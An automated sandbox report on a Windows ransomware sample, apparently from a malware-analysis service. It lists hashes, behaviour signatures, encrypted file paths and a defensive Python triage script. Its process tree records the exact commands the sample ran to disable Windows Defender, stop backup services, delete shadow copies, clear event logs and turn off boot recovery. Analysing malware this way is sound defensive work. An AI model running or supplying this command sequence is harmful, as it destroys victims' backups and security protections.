Analysis
- max time kernel: 23s
- max time network: 18s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 05-01-2022 13:28
Static task: static1
Behavioral task: behavioral1
Sample: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
Resource: win7-en-20211208
General
- Target: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
- Size: 3.9MB
- MD5: 0e4d44dde522c07d09d9e3086cfae803
- SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
- SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
- SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the MpCmdRun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2056)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 2032), bcdedit.exe (PID 1220)
- Drops file in Program Files directory (64 IoCs)
  Processes: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
  File opened for modification:
  - C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui
  - C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\7-Zip\Lang\an.txt.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png
  - C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png
  - C:\Program Files\DVD Maker\de-DE\DVDMaker.exe.mui
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml
  - C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\America\Atikokan.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui
  - C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png
  - C:\Program Files\Internet Explorer\en-US\F12.dll.mui
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui
  - C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png
  - C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png
  - C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png
  - C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\America\Belize.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\Microsoft Shared\ink\hwrfralm.dat
  - C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png
  - C:\Program Files\DVD Maker\sonicsptransform.ax
  - C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgzm.exe.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\jfr\profile.jfc.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml
  - C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui
  - C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj
  - C:\Program Files\Java\jre7\lib\zi\Europe\Samara.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
  - C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png
  - C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj
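The renamed entries in the list above all share one layout: the original name, a dot, a 43-character token, an underscore, a 12-character token, and the extension .cv2gj; the other entries keep their original names. The Python below is a worked example added to this page, not code from the sandbox or the sample's author. It parses that layout to recover original file names, checks whether the 43-character token is really constant across the entries (it is, for the ones shown) and tallies how the 12-character field varies. The six paths are copied verbatim from the list; the function names, the record layout and the reading of the token lengths as base64url (43 characters encode 32 bytes, 12 characters encode 9) are this example's own assumptions, and what the tokens actually mean is not established by the report.

```python
import re
from collections import Counter

# Constructed sample: six of the paths listed under "Drops file in Program
# Files directory", copied verbatim. Two of them carry no suffix at all.
OBSERVED = [
    r"C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj",
    r"C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj",
    r"C:\Program Files\7-Zip\Lang\an.txt.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj",
    r"C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj",
]

# <original name>.<43-char token>_<12-char token>.cv2gj, as seen on every
# renamed entry in the report. Treating the tokens as base64url alphabet is
# an assumption of this example (43 chars = 32 bytes unpadded, 12 = 9 bytes).
ENCRYPTED_NAME = re.compile(
    r"^(?P<original>.+)\.(?P<marker>[A-Za-z0-9_-]{43})_(?P<flags>[A-Za-z0-9_-]{12})\.cv2gj$"
)


def parse_path(path):
    """Split one observed path into (original_path, marker, flags).
    A path that does not carry the suffix comes back with both tokens None."""
    directory, _, name = path.rpartition("\\")
    m = ENCRYPTED_NAME.match(name)
    if m is None:
        return path, None, None
    return directory + "\\" + m.group("original"), m.group("marker"), m.group("flags")


def triage(paths):
    """Summarise a file list: how many entries carry the suffix, which marker
    values occur (the report shows one value; this checks rather than assumes
    it), how the 12-char field is distributed, and the recovered original
    paths for impact assessment."""
    markers, flags, originals = set(), Counter(), []
    for p in paths:
        original, marker, flag = parse_path(p)
        if marker is None:
            continue
        markers.add(marker)
        flags[flag] += 1
        originals.append(original)
    return {
        "with_suffix": len(originals),
        "no_suffix": len(paths) - len(originals),
        "markers": sorted(markers),
        "flags": dict(flags),
        "originals": originals,
    }


if __name__ == "__main__":
    for key, value in triage(OBSERVED).items():
        print(f"{key}: {value}")
```

A host sweep for files matching *.cv2gj whose name also contains the marker string is a tighter indicator than the extension alone. The entries without a suffix (the .mui, .png and .xml files) are a reminder that the sandbox lists files it saw opened for modification, not files it verified as encrypted, which is why the summary reports "with_suffix" rather than "encrypted".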
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 528)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2088), powershell.exe (PID 2184), 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe (PID 964)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token enabled, by process):
  - wevtutil.exe (PID 1240): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 1416): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 1596): SeSecurityPrivilege, SeBackupPrivilege
  - wmic.exe (PID 1736): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  - wmic.exe (PID 656): the same 20 privileges in the same order, recorded twice; the second pass is shown only up to "33" because the section lists 64 IoCs
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and image wrote to memory of target PID and image; each pair is recorded three times unless noted):
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1264 net.exe
  - 1264 net.exe -> 1660 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1560 net.exe
  - 1560 net.exe -> 268 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 432 net.exe
  - 432 net.exe -> 1488 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 912 net.exe
  - 912 net.exe -> 324 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1816 net.exe
  - 1816 net.exe -> 360 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1368 net.exe
  - 1368 net.exe -> 428 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1800 net.exe
  - 1800 net.exe -> 1828 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1136 net.exe
  - 1136 net.exe -> 1628 net1.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 2040 sc.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 992 sc.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1360 sc.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1748 sc.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 1324 sc.exe
  - 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -> 844 sc.exe (recorded once; the listing stops at the 64th entry)
Processes
- C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe (PID 964)
  Command line: "C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 1264)
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1660)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - C:\Windows\system32\net.exe (PID 1560)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 268)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\system32\net.exe (PID 432)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1488)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\system32\net.exe (PID 912)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 324)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\system32\net.exe (PID 1816)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 360)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\system32\net.exe (PID 1368)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 428)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\system32\net.exe (PID 1800)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1828)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\system32\net.exe (PID 1136)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1628)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\system32\sc.exe (PID 2040)
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  - C:\Windows\system32\sc.exe (PID 992)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\system32\sc.exe (PID 1360)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\system32\sc.exe (PID 1748)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\system32\sc.exe (PID 1324)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\system32\sc.exe (PID 844)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\system32\sc.exe (PID 1728)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\system32\sc.exe (PID 1132)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\system32\reg.exe (PID 916)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1708)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1576)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1216)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1040)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 668)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1488)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 816)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 852)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1860)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1872)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1808)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1688)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1668)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1868)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1308)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\schtasks.exe (PID 568)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\system32\schtasks.exe (PID 988)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1936)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\system32\schtasks.exe (PID 960)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1608)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\system32\reg.exe (PID 460)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1496)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 2028)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\system32\reg.exe (PID 1676)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1828)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 732)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1048)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1740)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 596)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1508)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1916)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - C:\Windows\system32\reg.exe (PID 1600)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\vssadmin.exe (PID 528)
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\system32\wevtutil.exe (PID 1240)
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe (PID 1416)
    Command line: wevtutil.exe cl security
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe (PID 1596)
    Command line: wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 1736)
    Command line: wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 656)
    Command line: wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\bcdedit.exe (PID 2032)
    Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\bcdedit.exe (PID 1220)
    Command line: bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\cmd.exe (PID 1540)
